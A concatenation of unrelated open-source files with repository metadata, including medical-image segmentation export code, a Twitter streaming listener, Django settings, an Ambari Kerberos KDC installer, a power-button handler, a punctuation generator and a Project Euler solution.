if np.any(np.array(current_shape) != np.array(shape_original_after_cropping)):
if order == 0:
seg_old_spacing = resize_segmentation(segmentation, shape_original_after_cropping, 0, 0)
else:
if force_separate_z is None:
if get_do_separate_z(dct.get('original_spacing')):
do_separate_z = True
lowres_axis = get_lowres_axis(dct.get('original_spacing'))
elif get_do_separate_z(dct.get('spacing_after_resampling')):
do_separate_z = True
lowres_axis = get_lowres_axis(dct.get('spacing_after_resampling'))
else:
do_separate_z = False
lowres_axis = None
else:
do_separate_z = force_separate_z
if do_separate_z:
lowres_axis = get_lowres_axis(dct.get('original_spacing'))
else:
lowres_axis = None
print("separate z:", do_separate_z, "lowres axis", lowres_axis)
seg_old_spacing = resample_data_or_seg(segmentation[None], shape_original_after_cropping, is_seg=True,
axis=lowres_axis, order=order, do_separate_z=do_separate_z, cval=0,
order_z=order_z)[0]
else:
seg_old_spacing = segmentation
bbox = dct.get('crop_bbox')
if bbox is not None:
seg_old_size = np.zeros(shape_original_before_cropping)
for c in range(3):
bbox[c][1] = np.min((bbox[c][0] + seg_old_spacing.shape[c], shape_original_before_cropping[c]))
seg_old_size[bbox[0][0]:bbox[0][1],
bbox[1][0]:bbox[1][1],
bbox[2][0]:bbox[2][1]] = seg_old_spacing
else:
seg_old_size = seg_old_spacing
seg_resized_itk = sitk.GetImageFromArray(seg_old_size.astype(np.uint8))
seg_resized_itk.SetSpacing(dct['itk_spacing'])
seg_resized_itk.SetOrigin(dct['itk_origin'])
seg_resized_itk.SetDirection(dct['itk_direction'])
sitk.WriteImage(seg_resized_itk, out_fname)
sys.stdout = sys.__stdout__
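# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): the minimal call
# shape for save_segmentation_nifti_from_softmax. The array layout
# (num_classes, x, y, z) and the dict keys below are the ones this module
# actually reads; all concrete values are illustrative assumptions.
#
# import numpy as np
# softmax = np.random.rand(3, 128, 128, 128)  # (num_classes, *spatial)
# properties = {
#     'size_after_cropping': (128, 128, 128),
#     'original_size_of_raw_data': (140, 140, 140),
#     'original_spacing': np.array([1., 1., 1.]),
#     'spacing_after_resampling': np.array([1., 1., 1.]),
#     'crop_bbox': [[0, 128], [0, 128], [0, 128]],
#     'itk_spacing': (1., 1., 1.),
#     'itk_origin': (0., 0., 0.),
#     'itk_direction': (1., 0., 0., 0., 1., 0., 0., 0., 1.),
# }
# save_segmentation_nifti_from_softmax(softmax, 'case_0000.nii.gz', properties)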
|
[
"[email protected]"
] | |
f56f9bcaa5d9294fc2f4329958f2a02d6b674c23
|
4503a3bfd940dce760b5f70e90e6fe2fe0cc4881
|
/week02/lectures/FirstCode.py
|
9d2c8a972ddc17efc1eafc379c1a682a399067d9
|
[] |
no_license
|
RicardoLima17/lecture
|
dba7de5c61507f51d51e3abc5c7c4c22ecda504f
|
b41f1201ab938fe0cab85566998390166c7fa7d8
|
refs/heads/main
| 2023-04-18T11:12:39.769760 | 2021-04-21T18:36:09 | 2021-04-21T18:36:09 | 334,456,464 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 103 |
py
|
# Program that greets the user
# Author: Ricardo Rodrigues
print('Hello world! \nHow are you today?')
|
[
"[email protected]"
] | |
790996181720155a34d4c398ecf0c34c1975d7fa
|
d53b659594941babb0ac33d18929f63cb7808cce
|
/python/test/twitter_streaming.py
|
b6d8bd6d30c5bac2e68c239244d15ca3d43c4bee
|
[
"Apache-2.0"
] |
permissive
|
brianmunson/MapperTwitter
|
479473307444c0eb1e01dfb66f59fcf143d56735
|
b47b8aa50ebe34a4263b2e47ccef47ea83266d14
|
refs/heads/master
| 2021-01-11T23:09:10.158012 | 2017-03-14T22:57:41 | 2017-03-14T22:57:41 | 78,553,738 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,002 |
py
|
# twitter streaming listener
# modified from adilmoujahid.com
import tweepy as ty
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
import os
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
consumer_key = os.environ.get("TW_CONSUMER")
consumer_secret = os.environ.get("TW_CONSUMER_SECRET")
access_token = os.environ.get("TW_ACCESS")
access_token_secret = os.environ.get("TW_ACCESS_SECRET")
auth = ty.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# class StdOutListener(StreamListener):
# def on_data(self, data):
# try:
# print(data)
# except:
# pass #ignore printing errors to console
# return True
# def on_error(self, status):
# print("Error with code: %s", status)
# return True
# def on_timeout(self):
# print("Timeout...")
# return True
class StdOutListener(StreamListener):
def __init__(self, api=None):
super(StdOutListener, self).__init__()
self.num_tweets = 0
def on_data(self, data):
if self.num_tweets < 10000:
try:
print(data)
self.num_tweets += 1
return True
except:
pass
return True
def on_error(self, status):
print("Error with code: %s", status)
return True
def on_timeout(self):
print("Timeout...")
return True
if __name__ == '__main__':
l = StdOutListener()
stream = ty.Stream(auth, l)
stream.filter(track=["InternetFriendsDay", "GalentinesDay"])
# stream.filter(track=["string1", "string2"])
# filters to track by string1, string2. can enter a longer list as well.
# stop program with Ctrl-C
# to run, from command line: python file_name.py > twitter_data.text
# here file_name is the name of the file containing this listener
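# Note: this listener targets the tweepy 3.x API; in tweepy 4.x,
# StreamListener was merged into tweepy.Stream, so on_data/on_error
# are overridden on a Stream subclass instead.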
|
[
"[email protected]"
] | |
fe271efef176ea856a983857fd44e6e559a41b2f
|
bf19f11f6e6626fa71550b9f2da72847f9db40f9
|
/tutorials/class_14/apps.py
|
72f8fa0f3b203b23675ce3861b0c6cedeb4d25de
|
[
"Apache-2.0"
] |
permissive
|
MeGustas-5427/SQL_Tutorials
|
b6caa6a325b423312e18949e88e5751883d21ac8
|
627372c2d5d8656d72645830c9a1fae1df278fc7
|
refs/heads/master
| 2023-04-06T10:19:53.022223 | 2021-03-20T13:20:50 | 2021-03-20T13:20:50 | 310,186,237 | 13 | 2 | null | 2021-01-14T02:34:57 | 2020-11-05T04:03:42 |
Python
|
UTF-8
|
Python
| false | false | 100 |
py
|
from django.apps import AppConfig
class Class14Config(AppConfig):
name = 'tutorials.class_14'
|
[
"[email protected]"
] | |
39ea59b534f5e9b9fe9597d3cb0a435cf20a1224
|
29fb2eb3b9bb21b529e814da53518fab2958693a
|
/thesis/images/ionizationStructure.py
|
bab29ae268d132cad0aaf36517a5e29f94941e0a
|
[] |
no_license
|
Vital-Fernandez/thesis_pipeline
|
acca734b1a2ce11b0bee5bd41fab534022ea295e
|
1253e2ed94e0f502a16cae6b88f84b633d0f16c2
|
refs/heads/master
| 2022-05-31T10:15:47.241645 | 2021-05-18T17:43:44 | 2021-05-18T17:43:44 | 90,319,650 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,922 |
py
|
from dazer_methods import Dazer
from numpy import nanmean, nanstd, mean, nan as np_nan
from uncertainties import ufloat, unumpy, umath
import pandas as pd
# Generate dazer object
dz = Dazer()
# Declare figure format
size_dict = {'figure.figsize': (14, 6), 'axes.labelsize': 20, 'legend.fontsize': 20, 'font.family': 'Times New Roman',
'mathtext.default': 'regular', 'xtick.labelsize': 20, 'ytick.labelsize': 20}
dz.FigConf(plotSize=size_dict)
# Declare data location
folder_data = '/home/vital/Dropbox/Astrophysics/Seminars/Cloudy School 2017/teporingos/Grid_data_vital/'
file_name_list_S = ['TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_S',
'TGrid_Mass200000.0_age5.48_zStar-2.1_zGas0.008.ele_S']
file_name_list_O = ['TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_O',
'TGrid_Mass200000.0_age5.48_zStar-2.1_zGas0.008.ele_O']
z_list = ['100000', '200000']
ions_list_S = ['S+', 'S+2', 'S+3']
ions_labels_S = [r'$S^{+}$', r'$S^{2+}$', r'$S^{3+}$']
ions_list_O = ['O+', 'O+2']
ions_labels_O = [r'$O^{+}$', r'$O^{2+}$']
labels_coords_S = [[(1.60e18, 0.98), (2.35e18, 0.98)],
[(1.0e18, 0.72), (1.77e18, 0.72)],
[(0.75e18, 0.000005), (2.0e18, 0.015)]]
labels_coords_O = [[(1.55e18, 0.5), (2.3e18, 0.5)],
[(1.03e18, 0.6), (1.8e18, 0.6)]]
# Generate the color map
dz.gen_colorList(0, 5)
# ions_colors_S = [dz.get_color(0), dz.get_color(1), dz.get_color(2)]
# ions_colors_O = [dz.get_color(3), dz.get_color(4)]
ions_colors_S = ['tab:orange', 'tab:red', 'tab:brown']
ions_colors_O = ['tab:blue', 'tab:green']
line_type = ['--', '-']
for i in range(len(file_name_list_S)):
file_name = file_name_list_S[i]
elemIon_df = pd.read_csv(folder_data + file_name, sep='\t')
for j in range(len(ions_list_S)):
ion = ions_list_S[j]
radious = elemIon_df['#depth'].values
ion_frac = elemIon_df[ion].values
label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i]))
dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_S[j], linestyle=line_type[i],
label=r'Cluster mass {}'.format(label), linewidth=2)
dz.plot_text(labels_coords_S[j][i][0] / 1e19, labels_coords_S[j][i][1], text=ions_labels_S[j],
color=ions_colors_S[j], fontsize=20, axis_plot=None)
file_name = file_name_list_O[i]
elemIon_df = pd.read_csv(folder_data + file_name, sep='\t')
for j in range(len(ions_list_O)):
ion = ions_list_O[j]
radious = elemIon_df['#depth'].values
ion_frac = elemIon_df[ion].values
label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i]))
dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_O[j], linestyle=line_type[i],
label=r'Cluster mass {}'.format(label))
dz.plot_text(labels_coords_O[j][i][0] / 1e19, labels_coords_O[j][i][1], text=ions_labels_O[j],
color=ions_colors_O[j], fontsize=20, axis_plot=None)
dz.FigWording(r'$R_{19}$ $(10^{19}cm)$', r'$X(A^{+i})$', '', ncols_leg=1)
leg = dz.Axis.get_legend()
leg.legendHandles[0].set_color('black')
leg.legendHandles[1].set_color('black')
# dz.display_fig()
dz.display_fig()
# dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/SulfurIonization_fraction_vs_cloudThickness')
# dz.savefig('/home/vital/Dropbox/Astrophysics/Seminars/Stasinska conference/SulfurIonization_fraction_vs_cloudThickness')
# #Load catalogue dataframe
# catalogue_dict = dz.import_catalogue()
# catalogue_df = dz.load_excel_DF('/home/vital/Dropbox/Astrophysics/Data/WHT_observations/WHT_Galaxies_properties.xlsx')
#
# #Define plot frame and colors
# size_dict = {'axes.labelsize':24, 'legend.fontsize':24, 'font.family':'Times New Roman', 'mathtext.default':'regular', 'xtick.labelsize':22, 'ytick.labelsize':22}
# dz.FigConf(plotSize = size_dict)
#
# dz.quick_indexing(catalogue_df)
# idcs = (pd.notnull(catalogue_df.OI_HI_emis2nd)) & (pd.notnull(catalogue_df.NI_HI_emis2nd)) & (pd.notnull(catalogue_df.HeII_HII_from_O_emis2nd)) & (catalogue_df.quick_index.notnull()) & (~catalogue_df.index.isin(['SHOC593']))
#
# #Prepare data
# O_values = catalogue_df.loc[idcs].OI_HI_emis2nd.values
# N_values = catalogue_df.loc[idcs].NI_HI_emis2nd.values
# HeII_HI = catalogue_df.loc[idcs].HeII_HII_from_O_emis2nd.values
# objects = catalogue_df.loc[idcs].quick_index.values
#
# N_O_ratio = N_values/O_values
#
# dz.data_plot(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), label = '', markerstyle='o', x_error=unumpy.std_devs(HeII_HI), y_error=unumpy.std_devs(N_O_ratio))
# dz.plot_text(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), text=objects, x_pad=1.005, y_pad=1.01)
#
# dz.FigWording(r'y', r'$N/O$', '')
# # dz.display_fig()
# dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/NO_to_y')
|
[
"[email protected]"
] | |
ec2e2f1225cf3c27c122d9403076f857e991253f
|
1b3613f17af551ae1023be03a78619fbf622a619
|
/vmthunder/openstack/common/jsonutils.py
|
662c79aae2e725e44c88fa37d4c622931c8ae778
|
[
"Apache-2.0"
] |
permissive
|
licyh/VMThunder
|
c2e9e45b1cb7263e6b23a631d2a16494265ba758
|
5daa10d1a78c52df2a5233c8f54823ac17cc7b06
|
refs/heads/master
| 2021-01-22T12:17:11.478468 | 2014-10-16T03:53:45 | 2014-10-16T03:53:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,489 |
py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''
JSON related utilities.
This module provides a few things:
1) A handy function for getting an object down to something that can be
JSON serialized. See to_primitive().
2) Wrappers around loads() and dumps(). The dumps() wrapper will
automatically use to_primitive() for you if needed.
3) This sets up anyjson to use the loads() and dumps() wrappers if anyjson
is available.
'''
import datetime
import functools
import inspect
import itertools
import json
import six
import six.moves.xmlrpc_client as xmlrpclib
from vmthunder.openstack.common import gettextutils
from vmthunder.openstack.common import importutils
from vmthunder.openstack.common import timeutils
netaddr = importutils.try_import("netaddr")
_nasty_type_tests = [inspect.ismodule, inspect.isclass, inspect.ismethod,
inspect.isfunction, inspect.isgeneratorfunction,
inspect.isgenerator, inspect.istraceback, inspect.isframe,
inspect.iscode, inspect.isbuiltin, inspect.isroutine,
inspect.isabstract]
_simple_types = (six.string_types + six.integer_types
+ (type(None), bool, float))
def to_primitive(value, convert_instances=False, convert_datetime=True,
level=0, max_depth=3):
"""Convert a complex object into primitives.
Handy for JSON serialization. We can optionally handle instances,
but since this is a recursive function, we could have cyclical
data structures.
To handle cyclical data structures we could track the actual objects
visited in a set, but not all objects are hashable. Instead we just
track the depth of the object inspections and don't go too deep.
Therefore, convert_instances=True is lossy ... be aware.
"""
# handle obvious types first - order of basic types determined by running
# full tests on nova project, resulting in the following counts:
# 572754 <type 'NoneType'>
# 460353 <type 'int'>
# 379632 <type 'unicode'>
# 274610 <type 'str'>
# 199918 <type 'dict'>
# 114200 <type 'datetime.datetime'>
# 51817 <type 'bool'>
# 26164 <type 'list'>
# 6491 <type 'float'>
# 283 <type 'tuple'>
# 19 <type 'long'>
if isinstance(value, _simple_types):
return value
if isinstance(value, datetime.datetime):
if convert_datetime:
return timeutils.strtime(value)
else:
return value
# value of itertools.count doesn't get caught by nasty_type_tests
# and results in infinite loop when list(value) is called.
if type(value) == itertools.count:
return six.text_type(value)
# FIXME(vish): Workaround for LP bug 852095. Without this workaround,
# tests that raise an exception in a mocked method that
# has a @wrap_exception with a notifier will fail. If
# we up the dependency to 0.5.4 (when it is released) we
# can remove this workaround.
if getattr(value, '__module__', None) == 'mox':
return 'mock'
if level > max_depth:
return '?'
# The try block may not be necessary after the class check above,
# but just in case ...
try:
recursive = functools.partial(to_primitive,
convert_instances=convert_instances,
convert_datetime=convert_datetime,
level=level,
max_depth=max_depth)
if isinstance(value, dict):
return dict((k, recursive(v)) for k, v in six.iteritems(value))
elif isinstance(value, (list, tuple)):
return [recursive(lv) for lv in value]
# It's not clear why xmlrpclib created their own DateTime type, but
# for our purposes, make it a datetime type which is explicitly
# handled
if isinstance(value, xmlrpclib.DateTime):
value = datetime.datetime(*tuple(value.timetuple())[:6])
if convert_datetime and isinstance(value, datetime.datetime):
return timeutils.strtime(value)
elif isinstance(value, gettextutils.Message):
return value.data
elif hasattr(value, 'iteritems'):
return recursive(dict(value.iteritems()), level=level + 1)
elif hasattr(value, '__iter__'):
return recursive(list(value))
elif convert_instances and hasattr(value, '__dict__'):
# Likely an instance of something. Watch for cycles.
# Ignore class member vars.
return recursive(value.__dict__, level=level + 1)
elif netaddr and isinstance(value, netaddr.IPAddress):
return six.text_type(value)
else:
if any(test(value) for test in _nasty_type_tests):
return six.text_type(value)
return value
except TypeError:
# Class objects are tricky since they may define something like
# __iter__ defined but it isn't callable as list().
return six.text_type(value)
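# Minimal usage sketch (illustrative, not part of the original module):
#   >>> import datetime
#   >>> to_primitive({'when': datetime.datetime(2014, 1, 2, 3, 4, 5)})
#   {'when': '2014-01-02T03:04:05.000000'}
# (assuming timeutils.strtime() keeps its default '%Y-%m-%dT%H:%M:%S.%f' format)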
def dumps(value, default=to_primitive, **kwargs):
return json.dumps(value, default=default, **kwargs)
def loads(s):
return json.loads(s)
def load(s):
return json.load(s)
try:
import anyjson
except ImportError:
pass
else:
anyjson._modules.append((__name__, 'dumps', TypeError,
'loads', ValueError, 'load'))
anyjson.force_implementation(__name__)
|
[
"[email protected]"
] | |
f8de0cc0211fe9b16c552b419529d6119fef0e83
|
89a00777e75a1e7ad0394fccbd38eb74438e483b
|
/package/scripts/master.py
|
87441b4de46dceffd484fe506614d5cb70938609
|
[] |
no_license
|
damienclaveau/kdc-stack
|
9258aac2324fcd03a863964722e04207ca747255
|
a7b247ef5e0767c981e2772b260a2c46aaa3864c
|
refs/heads/master
| 2021-01-21T00:43:38.052940 | 2015-03-17T05:12:42 | 2015-03-17T05:12:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,990 |
py
|
import sys, os, pwd, signal, time
from resource_management import *
from subprocess import call
class Master(Script):
def install(self, env):
# Install packages listed in metainfo.xml
self.install_packages(env)
self.configure(env)
import params
Execute('sed -i "s/EXAMPLE.COM/'+params.kdc_realm+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf')
Execute('sed -i "s/kerberos.example.com/'+params.kdc_host+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf')
Execute('sed -i "s/example.com/'+params.kdc_domain+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf')
Execute('/bin/cp -f /var/lib/ambari-server/resources/scripts/krb5.conf /etc')
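        # kdb5_util prompts for the KDC database master password twice
        # (entry plus confirmation), hence the password is written twice below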
Execute('echo "'+params.kdb_password+'" > passwd.txt')
Execute('echo "'+params.kdb_password+'" >> passwd.txt')
Execute('echo >> passwd.txt')
Execute('kdb5_util create -s < passwd.txt')
Execute('rm passwd.txt')
Execute('/etc/rc.d/init.d/krb5kdc start')
Execute('/etc/rc.d/init.d/kadmin start')
Execute('chkconfig krb5kdc on')
Execute('chkconfig kadmin on')
Execute('echo "'+params.kdc_adminpassword+'" > passwd.txt')
Execute('echo "'+params.kdc_adminpassword+'" >> passwd.txt')
Execute('echo >> passwd.txt')
Execute('kadmin.local -q "addprinc '+params.kdc_admin+'" < passwd.txt')
Execute('rm passwd.txt')
Execute('echo "*/[email protected] *" > /var/kerberos/krb5kdc/kadm5.acl')
#Execute('/etc/rc.d/init.d/krb5kdc restart')
#Execute('/etc/rc.d/init.d/kadmin restart')
def configure(self, env):
import params
env.set_params(params)
def stop(self, env):
import params
Execute('service krb5kdc stop')
Execute('service kadmin stop')
def start(self, env):
import params
Execute('service krb5kdc start')
Execute('service kadmin start')
def status(self, env):
import params
Execute('service krb5kdc status')
if __name__ == "__main__":
Master().execute()
|
[
"[email protected]"
] | |
c35de16dd47821fb8bd0c74d9ed293dc5ee70956
|
34ef83114e02b173bd2d55eb53ad399e738a8e3c
|
/django/code_test/teka/teka/settings.py
|
ca05f4f1f4426561e47f91918dae0a82be1e722d
|
[] |
no_license
|
vavilon/Python3
|
e976a18eb301e4953696d1e3f4730ed890da015a
|
8c79729747ce51d60ad685e6a2e58292954ed7eb
|
refs/heads/master
| 2023-01-09T13:44:37.408601 | 2018-01-25T22:41:14 | 2018-01-25T22:41:14 | 100,892,055 | 0 | 1 | null | 2022-12-26T20:29:27 | 2017-08-20T22:23:06 |
Python
|
UTF-8
|
Python
| false | false | 3,232 |
py
|
"""
Django settings for teka project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7&(=23s0&zbaks8=)r=a=5xb^mz61l1&m2&=to8_j*2h^c0ld9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'apps',
'bootstrap3',
'bootstrap4',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'teka.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'teka.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, "static"),
)
|
[
"[email protected]"
] | |
71bb3fad91cbbcdcb44e3c33d83d4877eb1fb75d
|
4324bfea818c8fa11f991f9eac24c6251db35dd5
|
/keycoded.py
|
51fb02586af64cac9a36340c024ddb635dc7c156
|
[] |
no_license
|
gjedeer/htc-vision-postmarketos
|
d368c13fd843c171d51e47cef786fa5f807fb03a
|
17840dd6fd382667af6846851e4d6710497dc759
|
refs/heads/master
| 2020-05-18T21:19:36.159309 | 2019-05-02T22:35:48 | 2019-05-02T22:35:48 | 184,657,935 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,943 |
py
|
#!/usr/bin/python
import struct
import time
import sys
import os
infile_path = "/dev/input/event" + (sys.argv[1] if len(sys.argv) > 1 else "3")
#long int, long int, unsigned short, unsigned short, unsigned int
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
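# struct input_event layout from <linux/input.h>, using native sizes:
#   struct timeval time;  -> two C longs (tv_sec, tv_usec)
#   __u16 type; __u16 code; __s32 value;  (value is read here as unsigned 'I')
# EVENT_SIZE is therefore 16 bytes on 32-bit and 24 bytes on 64-bit builds.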
framebuffer = int(os.getenv('FRAMEBUFFER', 0))
#open file in binary mode
in_file = open(infile_path, "rb")
buf = ""
POWER_BUTTON = 116
KEYUP = 0
KEYDOWN = 1
FB_BLANK_PATH = '/sys/class/graphics/fb%d/blank' % framebuffer
fb_blank = 0
power_key_down = None
def is_blank():
return fb_blank
def toggle_blank():
global fb_blank
blank = is_blank()
print "Blank: %d" % fb_blank
with open(FB_BLANK_PATH, 'w') as f:
f.write("%d" % int(not blank))
fb_blank = int(not blank)
print "Blank: %d" % fb_blank
while True:
buf += in_file.read(1)
if len(buf) >= EVENT_SIZE:
event = buf[:EVENT_SIZE]
buf = buf[EVENT_SIZE:]
(tv_sec, tv_usec, type, code, value) = struct.unpack(FORMAT, event)
if type != 0 or code != 0 or value != 0:
print("Event type %u, code %u, value %u at %d.%d" % \
(type, code, value, tv_sec, tv_usec))
if type == 1:
if code == POWER_BUTTON:
if value == KEYUP:
power_key_up = tv_sec + 0.000001 * tv_usec
if power_key_down and power_key_up - power_key_down > 5:
print "SHUTDOWN"
os.system("poweroff")
else:
toggle_blank()
power_key_down = None
elif value == KEYDOWN:
power_key_down = tv_sec + 0.000001 * tv_usec
else:
# Events with code, type and value == 0 are "separator" events
print("===========================================")
in_file.close()
|
[
"[email protected]"
] | |
33297c80981be4147b2f9bbef3eef38f163010b9
|
d509fb7b7a0a35bf752f977417d2b3119a00b084
|
/wordsiv/punctuation.py
|
63dcdad8de6602be16fda7c1bb7c737d55fbb405
|
[
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
tallpauley/wordsiv
|
c0904fc9fa8a6032a06a9cfb3b3cadc6373ca2da
|
935e6a08cd39134b7408b67d6ff721830d03a5ec
|
refs/heads/main
| 2023-05-10T04:32:39.135705 | 2021-05-20T21:26:22 | 2021-05-20T21:26:22 | 357,676,771 | 24 | 1 |
MIT
| 2021-05-20T21:26:23 | 2021-04-13T20:12:55 |
Python
|
UTF-8
|
Python
| false | false | 2,341 |
py
|
def default_punc_func(words, rand, start, end, inner, wrap):
# Sort of derived from wikipedia, but increased freq of lesser used punctuation
# https://en.wikipedia.org/wiki/English_punctuation#Frequency
# place "inner" punctuation (like comma, hyphen, etc)
insert_index = rand.randrange(len(words) - 1)
words[insert_index] = words[insert_index] + inner
# place surrounding punctuation
return wrap[0] + start + " ".join(words) + end + wrap[1]
def random_available(option_weight, glyphs_string, rand):
options, weights = zip(
*{
cs: prob
for cs, prob in option_weight.items()
if all(c in glyphs_string for c in cs)
}.items()
)
return rand.choices(options, weights=weights, k=1)[0]
def punctuate(words, glyphs_string, rand, language, punc_func=None):
"""Punctuate a list of words and join into a sentence using punc_func
Example w/ no punc available:
>>> import random
>>> words = ["hamburger", "fonts", "vise", "gurb", "ram"]
>>> glyphs_string = 'HAMBURGERFONTSIVhamburgerfontsiv'
>>> rand = random.Random(5)
>>> punctuate(words, glyphs_string, rand, "en", default_punc_func)
'hamburger fonts vise gurb ram'
Example w/ punc available:
>>> glyphs_string = 'HAMBURGERFONTSIVhamburgerfontsiv.,'
>>> punctuate(words, glyphs_string, rand, "en", default_punc_func)
'hamburger fonts vise gurb ram.'
"""
if not punc_func:
punc_func = default_punc_func
start = random_available(
default_punctuation[language]["start"], glyphs_string, rand
)
end = random_available(default_punctuation[language]["end"], glyphs_string, rand)
inner = random_available(
default_punctuation[language]["inner"], glyphs_string, rand
)
wrap = random_available(default_punctuation[language]["wrap"], glyphs_string, rand)
return punc_func(words, rand, start, end, inner, wrap)
default_punctuation = {
"en": {
"start": {"": 100},
# make no ending punctuation extremely low probability so
# it only happens when period is not available
"end": {"": 0.00001, ".": 100, "?": 40, "!": 20},
"inner": {"": 100, ",": 60, "—": 40, ":": 30, ";": 20},
"wrap": {("", ""): 100, ("“", "”"): 9, ("‘", "’"): 6},
}
}
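# A sketch of a custom punc_func (hypothetical name, same signature as the
# default): it receives the word list plus the chosen punctuation and must
# return the finished string.
#
#   def shouty_punc_func(words, rand, start, end, inner, wrap):
#       return wrap[0] + start + " ".join(words).upper() + end + wrap[1]
#
#   punctuate(words, glyphs_string, rand, "en", punc_func=shouty_punc_func)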
|
[
"[email protected]"
] | |
8e7f5dcc339c5006d5ba09592c2e38aaa9eda380
|
4a8318fb3775476b3cb849ef32426ced6bbb86e5
|
/py/p030.py
|
8a50ec6b350ba080f2b666f7e54dceb587c24fcd
|
[] |
no_license
|
zellyn/project-euler
|
422de8387320ebb9b7a978e348dd7e12e1048352
|
087061f007350ac2c210c5ef19f1ccc3d89dea35
|
refs/heads/master
| 2021-01-21T05:00:15.903675 | 2020-01-17T14:21:44 | 2020-01-17T14:21:44 | 154,268 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 459 |
py
|
#!/usr/bin/env python
# Project Euler
# Problem 30
#
# Find the sum of all the numbers that can be written as the sum of
# fifth powers of their digits.
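# Example: 4150 qualifies, since 4**5 + 1**5 + 5**5 + 0**5
#          = 1024 + 1 + 3125 + 0 = 4150.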
def fifth_power_eq(n):
sum = 0
i = n
while i:
sum += (i % 10) ** 5
i //= 10
return sum == n
def p030():
nums = []
for n in xrange(2, 999999):
if fifth_power_eq(n):
nums.append(n)
return sum(nums)
if __name__=='__main__':
print p030()
|
[
"[email protected]"
] | |
44a0a7737d19c1e6e47ddf5525d0d632188aabd2
|
10f397d1fe8c68dc5af033e0b88cb99be56bc4f2
|
/Statistics/models.py
|
28a3d7a4f4138e1e4c55db79c7ee134721781ded
|
[] |
no_license
|
wsqy/AccountRandmomAmount
|
db3905bd425c074935c256aab62f437fe7cb0ffc
|
b69bc1269a666c48fe954ac423a25d111e01176b
|
refs/heads/master
| 2023-06-29T12:49:35.947729 | 2020-06-30T03:27:05 | 2020-06-30T03:27:05 | 271,683,993 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,592 |
py
|
from django.db import models
# from django.conf import settings
